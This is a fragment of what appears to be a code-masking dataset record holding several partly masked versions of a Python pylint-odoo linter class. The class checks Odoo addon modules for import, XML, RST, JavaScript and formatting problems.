node.modname\n self._check_imported_packages(node, package)\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_import(self, node):\n self.check_odoo_relative_import(node)\n for name, _ in node.names:\n if isinstance(node.scope(), astroid.Module):\n self._check_imported_packages(node, name)\n\n @utils.check_messages('except-pass')\n def visit_tryexcept(self, node):\n \"\"\"Visit block try except\"\"\"\n for handler in node.handlers:\n if not handler.name and len(handler.body) == 1 and isinstance(\n handler.body[0], astroid.node_classes.Pass):\n self.add_message('except-pass', node=handler)\n\n def _check_rst_syntax_error(self):\n \"\"\"Check if rst file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n rst_files = self.filter_files_ext('rst')\n self.msg_args = []\n for rst_file in rst_files:\n errors = self.check_rst_syntax(os.path.join(self.module_path,\n rst_file))\n for error in errors:\n msg = error.full_message\n res = re.search(\n 'No directive entry for \"([\\\\w|\\\\-]+)\"|Unknown directive type \"([\\\\w|\\\\-]+)\"|No role entry for \"([\\\\w|\\\\-]+)\"|Unknown interpreted text role \"([\\\\w|\\\\-]+)\"'\n , msg)\n if res:\n continue\n self.msg_args.append(('%s:%d' % (rst_file, error.line or 0),\n msg.strip('\\n').replace('\\n', '|')))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_xml_syntax_error(self):\n \"\"\"Check if xml file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n result = self.parse_xml(os.path.join(self.module_path, xml_file))\n if isinstance(result, string_types):\n self.msg_args.append((xml_file, result.strip('\\n').replace(\n '\\n', '|')))\n if self.msg_args:\n return False\n return True\n <mask token>\n <mask token>\n <mask token>\n\n def _check_redundant_modulename_xml(self):\n \"\"\"Check redundant module name in xml file.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file_rel in self.filter_files_ext('xml', relpath=True):\n xml_file = os.path.join(self.module_path, xml_file_rel)\n for xml_id, lineno in self.get_xml_redundant_module_name(xml_file,\n self.module):\n self.msg_args.append(('%s:%d' % (xml_file_rel, lineno), xml_id)\n )\n if self.msg_args:\n return False\n return True\n <mask token>\n <mask token>\n <mask token>\n\n def _check_dangerous_filter_wo_user(self):\n \"\"\"Check dangerous filter without a user assigned.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n ir_filter_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.filters')\n for ir_filter_record in ir_filter_records:\n ir_filter_fields = ir_filter_record.xpath(\n \"field[@name='name' or @name='user_id']\")\n if ir_filter_fields and len(ir_filter_fields) == 1:\n self.msg_args = '%s:%d' % (xml_file, ir_filter_record.\n sourceline), ir_filter_record.get('id')\n return False\n return True\n <mask token>\n\n @staticmethod\n def _is_replaced_field(view):\n try:\n arch = view.xpath(\"field[@name='arch' and @type='xml'][1]\")[0]\n except IndexError:\n return None\n replaces = arch.xpath(\n \".//field[@name='name' and @position='replace'][1]\") + arch.xpath(\n \".//xpath[@position='replace'][1]\")\n return bool(replaces)\n\n def _check_dangerous_view_replace_wo_priority(self):\n \"\"\"Check dangerous view defined with low priority\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n views = self.get_xml_records(os.path.join(self.module_path,\n xml_file), model='ir.ui.view')\n for view in views:\n priority = self._get_priority(view)\n is_replaced_field = self._is_replaced_field(view)\n if is_replaced_field and priority < self.config.min_priority:\n self.msg_args.append(('%s:%s' % (xml_file, view.\n sourceline), priority, self.config.min_priority))\n if self.msg_args:\n return False\n return True\n\n def _check_create_user_wo_reset_password(self):\n \"\"\"Check xml records of user without the context\n 'context=\"{'no_reset_password': True}\"'\n This context avoid send email and mail log warning\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n user_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='res.users')\n self.msg_args.extend([('%s:%s' % (xml_file, user_record.\n sourceline)) for user_record in user_records if user_record\n .xpath(\"field[@name='name']\") and 'no_reset_password' not in\n (user_record.get('context') or '')])\n if self.msg_args:\n return False\n return True\n\n def _check_javascript_lint(self):\n \"\"\"Check javascript lint\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for js_file_rel in self.filter_files_ext('js', relpath=True):\n js_file = os.path.join(self.module_path, js_file_rel)\n errors = self.check_js_lint(js_file, self.config.jslintrc)\n for error in errors:\n self.msg_args.append((js_file_rel + error,))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_data_xml_node(self):\n \"\"\"Check deprecated <data> xml node inside <odoo> xml node\n :return: False if found <data> xml node inside <odoo> xml node\"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n odoo_nodes = doc.xpath('/odoo') if not isinstance(doc, string_types\n ) else []\n children, data_node = (odoo_nodes[0].getchildren(), odoo_nodes[\n 0].findall('data')) if odoo_nodes else ([], [])\n if len(children) == 1 and len(data_node) == 1:\n lineno = odoo_nodes[0].sourceline\n self.msg_args.append('%s:%s' % (xml_file, lineno))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_wrong_tabs_instead_of_spaces(self):\n \"\"\"Check wrong tabs character instead of four spaces.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = os.path.join(self.module_path, ext_file_rel)\n countline = 0\n with open(ext_file, 'rb') as fp:\n for line in fp:\n countline += 1\n line_space_trip = line.lstrip(b' ')\n if line_space_trip != line_space_trip.lstrip(b'\\t'):\n self.msg_args.append('%s:%d' % (ext_file_rel,\n countline))\n if self.msg_args:\n return False\n return True\n <mask token>\n <mask token>\n\n def _get_xml_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in (self.manifest_dict.get(data_type) or []):\n if not fname.endswith('.xml'):\n continue\n referenced_files.update(self.\n _get_xml_referenced_files_report(fname, data_type))\n return referenced_files\n <mask token>\n\n def _get_module_files(self):\n module_files = []\n for type_file in self.config.extfiles_convert:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n module_files.append(ext_file_rel)\n return module_files\n <mask token>\n\n def _check_xml_attribute_translatable(self):\n \"\"\"The xml attribute is missing the translation=\"off\" tag\n Example <attribute name=\"groups\">sale.group</attribute>\n \"\"\"\n if self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions != ['8.0']:\n return True\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), None,\n '//attribute[not(@name=\"string\") and not(@translation)]'):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), 'xml_id'))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_tree_attribute(self):\n \"\"\"The tree-view declaration is using a deprecated attribute.\n Example <tree string=\"Partners\"></tree>\n \"\"\"\n checks = [{'attr': 'colors', 'skip_versions': {'4.2', '5.0', '6.0',\n '6.1', '7.0', '8.0'}, 'xpath': './/tree[@colors]'}, {'attr':\n 'fonts', 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0',\n '8.0'}, 'xpath': './/tree[@fonts]'}, {'attr': 'string',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0'}, 'xpath':\n './/tree[@string]'}]\n valid_versions = set(self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions)\n applicable_checks = [check for check in checks if check['attr'] in\n self.config.deprecated_tree_attributes and bool(valid_versions -\n check['skip_versions'])]\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.ui.view'):\n for check in applicable_checks:\n if record.xpath(check['xpath']):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), check['attr']))\n if self.msg_args:\n return False\n return True\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ModuleChecker(misc.WrapperModuleChecker):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @utils.check_messages('consider-merging-classes-inherited')\n def visit_assign(self, node):\n if not self.odoo_node:\n return\n if not self.linter.is_message_enabled(\n 'consider-merging-classes-inherited', node.lineno):\n return\n node_left = node.targets[0]\n if not isinstance(node_left, astroid.node_classes.AssignName\n ) or node_left.name not in ('_inherit', '_name') or not isinstance(\n node.value, astroid.node_classes.Const) or not isinstance(node.\n parent, astroid.ClassDef):\n return\n if node_left.name == '_name':\n node.parent.odoo_attribute_name = node.value.value\n return\n _name = getattr(node.parent, 'odoo_attribute_name', None)\n _inherit = node.value.value\n if _name and _name != _inherit:\n return\n key = self.odoo_node, _inherit\n node.file = self.linter.current_file\n self.inh_dup.setdefault(key, []).append(node)\n\n def _build_whitelist_module_patterns(self):\n known_patterns = []\n for known_pattern in self.config.import_name_whitelist:\n pattern = known_pattern.replace('*', '.*').replace('?', '.?')\n known_patterns.append(re.compile('^' + pattern + '$'))\n return known_patterns\n\n def open(self):\n \"\"\"Define variables to use cache\"\"\"\n self.inh_dup = {}\n patterns = self._build_whitelist_module_patterns()\n self._whitelist_module_patterns = patterns\n super(ModuleChecker, self).open()\n\n def close(self):\n \"\"\"Final process get all cached values and add messages\"\"\"\n for (odoo_node, class_dup_name), nodes in self.inh_dup.items():\n if len(nodes) == 1:\n continue\n path_nodes = []\n for node in nodes[1:]:\n relpath = os.path.relpath(node.file, os.path.dirname(\n odoo_node.file))\n path_nodes.append('%s:%d' % (relpath, node.lineno))\n self.add_message('consider-merging-classes-inherited', node=\n nodes[0], args=(class_dup_name, ', '.join(path_nodes)))\n <mask token>\n\n def check_odoo_relative_import(self, node):\n if self.odoo_module_name in self._get_odoo_module_imported(node):\n self.add_message('odoo-addons-relative-import', node=node, args\n =self.odoo_module_name)\n <mask token>\n <mask token>\n\n def _is_module_name_in_whitelist(self, module_name):\n parts = module_name.split('.')\n module_names_to_check = ['.'.join(parts[:first_k]) for first_k in\n range(len(parts), 0, -1)]\n for module_name_to_check in module_names_to_check:\n for pattern in self._whitelist_module_patterns:\n if pattern.match(module_name_to_check):\n return True\n return False\n <mask token>\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_importfrom(self, node):\n self.check_odoo_relative_import(node)\n if isinstance(node.scope(), astroid.Module):\n package = node.modname\n self._check_imported_packages(node, package)\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_import(self, node):\n self.check_odoo_relative_import(node)\n for name, _ in node.names:\n if isinstance(node.scope(), astroid.Module):\n self._check_imported_packages(node, name)\n\n @utils.check_messages('except-pass')\n def visit_tryexcept(self, node):\n \"\"\"Visit block try except\"\"\"\n for handler in node.handlers:\n if not handler.name and len(handler.body) == 1 and isinstance(\n handler.body[0], astroid.node_classes.Pass):\n self.add_message('except-pass', node=handler)\n\n def _check_rst_syntax_error(self):\n \"\"\"Check if rst file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n rst_files = self.filter_files_ext('rst')\n self.msg_args = []\n for rst_file in rst_files:\n errors = self.check_rst_syntax(os.path.join(self.module_path,\n rst_file))\n for error in errors:\n msg = error.full_message\n res = re.search(\n 'No directive entry for \"([\\\\w|\\\\-]+)\"|Unknown directive type \"([\\\\w|\\\\-]+)\"|No role entry for \"([\\\\w|\\\\-]+)\"|Unknown interpreted text role \"([\\\\w|\\\\-]+)\"'\n , msg)\n if res:\n continue\n self.msg_args.append(('%s:%d' % (rst_file, error.line or 0),\n msg.strip('\\n').replace('\\n', '|')))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_xml_syntax_error(self):\n \"\"\"Check if xml file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n result = self.parse_xml(os.path.join(self.module_path, xml_file))\n if isinstance(result, string_types):\n self.msg_args.append((xml_file, result.strip('\\n').replace(\n '\\n', '|')))\n if self.msg_args:\n return False\n return True\n\n def _get_duplicate_xml_record_id(self, records):\n \"\"\"Get duplicated records based on attribute id\n :param records list: List of lxml.etree.Element \"<record\"\n :return: Duplicated items.\n e.g. {record.id: [record_node1, record_node2]}\n :rtype: dict\n \"\"\"\n all_records = {}\n for record in records:\n record_id = '%s/%s_noupdate_%s' % (record.attrib.get('section',\n ''), record.attrib.get('id', ''), record.getparent().attrib\n .get('noupdate', '0'))\n all_records.setdefault(record_id, []).append(record)\n records = {}\n for key, items in all_records.items():\n if not len(items) < 2:\n records[key] = items\n return records\n <mask token>\n <mask token>\n\n def _check_redundant_modulename_xml(self):\n \"\"\"Check redundant module name in xml file.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file_rel in self.filter_files_ext('xml', relpath=True):\n xml_file = os.path.join(self.module_path, xml_file_rel)\n for xml_id, lineno in self.get_xml_redundant_module_name(xml_file,\n self.module):\n self.msg_args.append(('%s:%d' % (xml_file_rel, lineno), xml_id)\n )\n if self.msg_args:\n return False\n return True\n <mask token>\n <mask token>\n\n def _check_duplicate_xml_fields(self):\n \"\"\"Check duplicate field in all record of xml files of a odoo module.\n Important note: this check does not work with inherited views.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file)):\n if record.xpath('field[@name=\"inherit_id\"]'):\n continue\n for xpath in ['field', 'field/*/field',\n 'field/*/field/tree/field', 'field/*/field/form/field']:\n for name, fobjs in self._get_duplicate_xml_fields(record\n .xpath(xpath)).items():\n self.msg_args.append(('%s:%d' % (xml_file, fobjs[0]\n .sourceline), name[0], ', '.join([str(fobj.\n sourceline) for fobj in fobjs[1:]])))\n if self.msg_args:\n return False\n return True\n\n def _check_dangerous_filter_wo_user(self):\n \"\"\"Check dangerous filter without a user assigned.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n ir_filter_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.filters')\n for ir_filter_record in ir_filter_records:\n ir_filter_fields = ir_filter_record.xpath(\n \"field[@name='name' or @name='user_id']\")\n if ir_filter_fields and len(ir_filter_fields) == 1:\n self.msg_args = '%s:%d' % (xml_file, ir_filter_record.\n sourceline), ir_filter_record.get('id')\n return False\n return True\n <mask token>\n\n @staticmethod\n def _is_replaced_field(view):\n try:\n arch = view.xpath(\"field[@name='arch' and @type='xml'][1]\")[0]\n except IndexError:\n return None\n replaces = arch.xpath(\n \".//field[@name='name' and @position='replace'][1]\") + arch.xpath(\n \".//xpath[@position='replace'][1]\")\n return bool(replaces)\n\n def _check_dangerous_view_replace_wo_priority(self):\n \"\"\"Check dangerous view defined with low priority\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n views = self.get_xml_records(os.path.join(self.module_path,\n xml_file), model='ir.ui.view')\n for view in views:\n priority = self._get_priority(view)\n is_replaced_field = self._is_replaced_field(view)\n if is_replaced_field and priority < self.config.min_priority:\n self.msg_args.append(('%s:%s' % (xml_file, view.\n sourceline), priority, self.config.min_priority))\n if self.msg_args:\n return False\n return True\n\n def _check_create_user_wo_reset_password(self):\n \"\"\"Check xml records of user without the context\n 'context=\"{'no_reset_password': True}\"'\n This context avoid send email and mail log warning\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n user_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='res.users')\n self.msg_args.extend([('%s:%s' % (xml_file, user_record.\n sourceline)) for user_record in user_records if user_record\n .xpath(\"field[@name='name']\") and 'no_reset_password' not in\n (user_record.get('context') or '')])\n if self.msg_args:\n return False\n return True\n\n def _check_javascript_lint(self):\n \"\"\"Check javascript lint\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for js_file_rel in self.filter_files_ext('js', relpath=True):\n js_file = os.path.join(self.module_path, js_file_rel)\n errors = self.check_js_lint(js_file, self.config.jslintrc)\n for error in errors:\n self.msg_args.append((js_file_rel + error,))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_data_xml_node(self):\n \"\"\"Check deprecated <data> xml node inside <odoo> xml node\n :return: False if found <data> xml node inside <odoo> xml node\"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n odoo_nodes = doc.xpath('/odoo') if not isinstance(doc, string_types\n ) else []\n children, data_node = (odoo_nodes[0].getchildren(), odoo_nodes[\n 0].findall('data')) if odoo_nodes else ([], [])\n if len(children) == 1 and len(data_node) == 1:\n lineno = odoo_nodes[0].sourceline\n self.msg_args.append('%s:%s' % (xml_file, lineno))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_wrong_tabs_instead_of_spaces(self):\n \"\"\"Check wrong tabs character instead of four spaces.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = os.path.join(self.module_path, ext_file_rel)\n countline = 0\n with open(ext_file, 'rb') as fp:\n for line in fp:\n countline += 1\n line_space_trip = line.lstrip(b' ')\n if line_space_trip != line_space_trip.lstrip(b'\\t'):\n self.msg_args.append('%s:%d' % (ext_file_rel,\n countline))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _get_manifest_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in (self.manifest_dict.get(data_type) or []):\n referenced_files[fname] = data_type\n return referenced_files\n\n def _get_xml_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in (self.manifest_dict.get(data_type) or []):\n if not fname.endswith('.xml'):\n continue\n referenced_files.update(self.\n _get_xml_referenced_files_report(fname, data_type))\n return referenced_files\n\n def _get_xml_referenced_files_report(self, fname, data_type):\n return {os.path.join(*record.attrib[attribute].split(os.sep)[1:]):\n data_type for attribute in ['xml', 'xsl'] for record in self.\n parse_xml(os.path.join(self.module_path, fname)).xpath(\n '//report[@%s]' % attribute)}\n\n def _get_module_files(self):\n module_files = []\n for type_file in self.config.extfiles_convert:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n module_files.append(ext_file_rel)\n return module_files\n <mask token>\n\n def _check_xml_attribute_translatable(self):\n \"\"\"The xml attribute is missing the translation=\"off\" tag\n Example <attribute name=\"groups\">sale.group</attribute>\n \"\"\"\n if self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions != ['8.0']:\n return True\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), None,\n '//attribute[not(@name=\"string\") and not(@translation)]'):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), 'xml_id'))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_tree_attribute(self):\n \"\"\"The tree-view declaration is using a deprecated attribute.\n Example <tree string=\"Partners\"></tree>\n \"\"\"\n checks = [{'attr': 'colors', 'skip_versions': {'4.2', '5.0', '6.0',\n '6.1', '7.0', '8.0'}, 'xpath': './/tree[@colors]'}, {'attr':\n 'fonts', 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0',\n '8.0'}, 'xpath': './/tree[@fonts]'}, {'attr': 'string',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0'}, 'xpath':\n './/tree[@string]'}]\n valid_versions = set(self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions)\n applicable_checks = [check for check in checks if check['attr'] in\n self.config.deprecated_tree_attributes and bool(valid_versions -\n check['skip_versions'])]\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.ui.view'):\n for check in applicable_checks:\n if record.xpath(check['xpath']):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), check['attr']))\n if self.msg_args:\n return False\n return True\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ModuleChecker(misc.WrapperModuleChecker):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @utils.check_messages('consider-merging-classes-inherited')\n def visit_assign(self, node):\n if not self.odoo_node:\n return\n if not self.linter.is_message_enabled(\n 'consider-merging-classes-inherited', node.lineno):\n return\n node_left = node.targets[0]\n if not isinstance(node_left, astroid.node_classes.AssignName\n ) or node_left.name not in ('_inherit', '_name') or not isinstance(\n node.value, astroid.node_classes.Const) or not isinstance(node.\n parent, astroid.ClassDef):\n return\n if node_left.name == '_name':\n node.parent.odoo_attribute_name = node.value.value\n return\n _name = getattr(node.parent, 'odoo_attribute_name', None)\n _inherit = node.value.value\n if _name and _name != _inherit:\n return\n key = self.odoo_node, _inherit\n node.file = self.linter.current_file\n self.inh_dup.setdefault(key, []).append(node)\n\n def _build_whitelist_module_patterns(self):\n known_patterns = []\n for known_pattern in self.config.import_name_whitelist:\n pattern = known_pattern.replace('*', '.*').replace('?', '.?')\n known_patterns.append(re.compile('^' + pattern + '$'))\n return known_patterns\n\n def open(self):\n \"\"\"Define variables to use cache\"\"\"\n self.inh_dup = {}\n patterns = self._build_whitelist_module_patterns()\n self._whitelist_module_patterns = patterns\n super(ModuleChecker, self).open()\n\n def close(self):\n \"\"\"Final process get all cached values and add messages\"\"\"\n for (odoo_node, class_dup_name), nodes in self.inh_dup.items():\n if len(nodes) == 1:\n continue\n path_nodes = []\n for node in nodes[1:]:\n relpath = os.path.relpath(node.file, os.path.dirname(\n odoo_node.file))\n path_nodes.append('%s:%d' % (relpath, node.lineno))\n self.add_message('consider-merging-classes-inherited', node=\n nodes[0], args=(class_dup_name, ', '.join(path_nodes)))\n <mask token>\n\n def check_odoo_relative_import(self, node):\n if self.odoo_module_name in self._get_odoo_module_imported(node):\n self.add_message('odoo-addons-relative-import', node=node, args\n =self.odoo_module_name)\n\n @staticmethod\n def _is_absolute_import(node, name):\n modnode = node.root()\n importedmodnode = ModuleChecker._get_imported_module(node, name)\n if (importedmodnode and importedmodnode.file and modnode is not\n importedmodnode and importedmodnode.name != name):\n return True\n return False\n <mask token>\n\n def _is_module_name_in_whitelist(self, module_name):\n parts = module_name.split('.')\n module_names_to_check = ['.'.join(parts[:first_k]) for first_k in\n range(len(parts), 0, -1)]\n for module_name_to_check in module_names_to_check:\n for pattern in self._whitelist_module_patterns:\n if pattern.match(module_name_to_check):\n return True\n return False\n\n def _check_imported_packages(self, node, module_name):\n \"\"\"Check if the import node is a external dependency to validate it\"\"\"\n if not module_name:\n return\n if not self.manifest_dict:\n return\n if not isinstance(node.parent, astroid.Module):\n return\n if self._is_absolute_import(node, module_name):\n return\n if self._is_module_name_in_whitelist(module_name):\n return\n isort_obj = isort.SortImports(file_contents='')\n import_category = isort_obj.place_module(module_name)\n if import_category not in ('FIRSTPARTY', 'THIRDPARTY'):\n return\n relpath = os.path.relpath(node.parent.file, os.path.dirname(self.\n manifest_file))\n if os.path.dirname(relpath) == 'tests':\n return\n self.add_message('missing-import-error', node=node, args=(module_name,)\n )\n ext_deps = self.manifest_dict.get('external_dependencies') or {}\n py_ext_deps = ext_deps.get('python') or []\n if isinstance(node, astroid.ImportFrom) and (node.level or 0) >= 1:\n return\n if module_name not in py_ext_deps and module_name.split('.')[0\n ] not in py_ext_deps:\n self.add_message('missing-manifest-dependency', node=node, args\n =(module_name,))\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_importfrom(self, node):\n self.check_odoo_relative_import(node)\n if isinstance(node.scope(), astroid.Module):\n package = node.modname\n self._check_imported_packages(node, package)\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_import(self, node):\n self.check_odoo_relative_import(node)\n for name, _ in node.names:\n if isinstance(node.scope(), astroid.Module):\n self._check_imported_packages(node, name)\n\n @utils.check_messages('except-pass')\n def visit_tryexcept(self, node):\n \"\"\"Visit block try except\"\"\"\n for handler in node.handlers:\n if not handler.name and len(handler.body) == 1 and isinstance(\n handler.body[0], astroid.node_classes.Pass):\n self.add_message('except-pass', node=handler)\n\n def _check_rst_syntax_error(self):\n \"\"\"Check if rst file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n rst_files = self.filter_files_ext('rst')\n self.msg_args = []\n for rst_file in rst_files:\n errors = self.check_rst_syntax(os.path.join(self.module_path,\n rst_file))\n for error in errors:\n msg = error.full_message\n res = re.search(\n 'No directive entry for \"([\\\\w|\\\\-]+)\"|Unknown directive type \"([\\\\w|\\\\-]+)\"|No role entry for \"([\\\\w|\\\\-]+)\"|Unknown interpreted text role \"([\\\\w|\\\\-]+)\"'\n , msg)\n if res:\n continue\n self.msg_args.append(('%s:%d' % (rst_file, error.line or 0),\n msg.strip('\\n').replace('\\n', '|')))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_xml_syntax_error(self):\n \"\"\"Check if xml file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n result = self.parse_xml(os.path.join(self.module_path, xml_file))\n if isinstance(result, string_types):\n self.msg_args.append((xml_file, result.strip('\\n').replace(\n '\\n', '|')))\n if self.msg_args:\n return False\n return True\n\n def _get_duplicate_xml_record_id(self, records):\n \"\"\"Get duplicated records based on attribute id\n :param records list: List of lxml.etree.Element \"<record\"\n :return: Duplicated items.\n e.g. {record.id: [record_node1, record_node2]}\n :rtype: dict\n \"\"\"\n all_records = {}\n for record in records:\n record_id = '%s/%s_noupdate_%s' % (record.attrib.get('section',\n ''), record.attrib.get('id', ''), record.getparent().attrib\n .get('noupdate', '0'))\n all_records.setdefault(record_id, []).append(record)\n records = {}\n for key, items in all_records.items():\n if not len(items) < 2:\n records[key] = items\n return records\n\n def _check_duplicate_xml_record_id(self):\n \"\"\"Check duplicated XML-IDs inside of the files of\n each manifest-section treated them separately\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_records = []\n for fname, section in self._get_manifest_referenced_files().items():\n if os.path.splitext(fname)[1].lower() != '.xml':\n continue\n fname = os.path.join(self.module_path, fname)\n for xml_record in self.get_xml_records(fname):\n xml_record.attrib['section'] = section\n xml_records.append(xml_record)\n for name, fobjs in self._get_duplicate_xml_record_id(xml_records\n ).items():\n self.msg_args.append(('%s:%d' % (os.path.relpath(fobjs[0].base,\n self.module_path), fobjs[0].sourceline), name, ', '.join([(\n os.path.relpath(fobj.base, self.module_path) + ':' + str(\n fobj.sourceline)) for fobj in fobjs[1:]])))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_redundant_modulename_xml(self):\n \"\"\"Check redundant module name in xml file.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file_rel in self.filter_files_ext('xml', relpath=True):\n xml_file = os.path.join(self.module_path, xml_file_rel)\n for xml_id, lineno in self.get_xml_redundant_module_name(xml_file,\n self.module):\n self.msg_args.append(('%s:%d' % (xml_file_rel, lineno), xml_id)\n )\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _get_duplicate_xml_fields(self, fields):\n \"\"\"Get duplicated xml fields based on attribute name\n :param fields list: List of lxml.etree.Element \"<field\"\n :return: Duplicated items.\n e.g. {field.name: [field_node1, field_node2]}\n :rtype: dict\n \"\"\"\n all_fields = {}\n for field in fields:\n field_xml = field.attrib.get('name')\n if not field_xml:\n continue\n all_fields.setdefault((field_xml, field.attrib.get('context'),\n field.attrib.get('filter_domain'), field.getparent()), []\n ).append(field)\n return dict(((name, context, filter_domain, parent_node), nodes) for\n (name, context, filter_domain, parent_node), nodes in\n all_fields.items() if len(nodes) >= 2)\n\n def _check_duplicate_xml_fields(self):\n \"\"\"Check duplicate field in all record of xml files of a odoo module.\n Important note: this check does not work with inherited views.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file)):\n if record.xpath('field[@name=\"inherit_id\"]'):\n continue\n for xpath in ['field', 'field/*/field',\n 'field/*/field/tree/field', 'field/*/field/form/field']:\n for name, fobjs in self._get_duplicate_xml_fields(record\n .xpath(xpath)).items():\n self.msg_args.append(('%s:%d' % (xml_file, fobjs[0]\n .sourceline), name[0], ', '.join([str(fobj.\n sourceline) for fobj in fobjs[1:]])))\n if self.msg_args:\n return False\n return True\n\n def _check_dangerous_filter_wo_user(self):\n \"\"\"Check dangerous filter without a user assigned.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n 